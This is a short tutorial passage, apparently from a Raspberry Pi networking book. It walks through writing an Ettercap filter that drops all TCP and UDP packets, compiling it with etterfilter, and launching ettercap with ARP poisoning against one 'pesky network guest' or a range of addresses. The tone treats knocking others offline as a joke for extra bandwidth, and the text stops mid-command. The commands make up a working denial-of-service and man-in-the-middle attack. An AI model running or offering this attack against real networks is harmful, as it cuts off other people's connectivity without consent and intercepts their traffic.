Knocking all visitors off your network
There are times in every network owner's life when we just need that little extra bandwidth to watch the latest cat videos on YouTube in glorious HD resolution, right?
With the following Ettercap filter, our Pi will essentially become a very restrictive firewall and drop every single packet that comes our way, thus forcing the guests on our network to take a timeout:
pi@raspberrypi ~ $ nano dropfilter.ecf
Here is our minimalistic drop filter:
if (ip.proto == TCP || ip.proto == UDP) { drop(); msg("Dropped a packet!\n"); }
The next step is to compile our Ettercap filter code into a binary file that can be interpreted by Ettercap, using the following command:
pi@raspberrypi ~ $ etterfilter dropfilter.ecf -o dropfilter.ef
Now all we have to do is fire up Ettercap and load the filter. You can either target one particularly pesky network guest or a range of IP addresses:
pi@raspberrypi ~ $ sudo ettercap -q -T -i wlan0 -M arp -F dropfilter.ef:1 /[target]...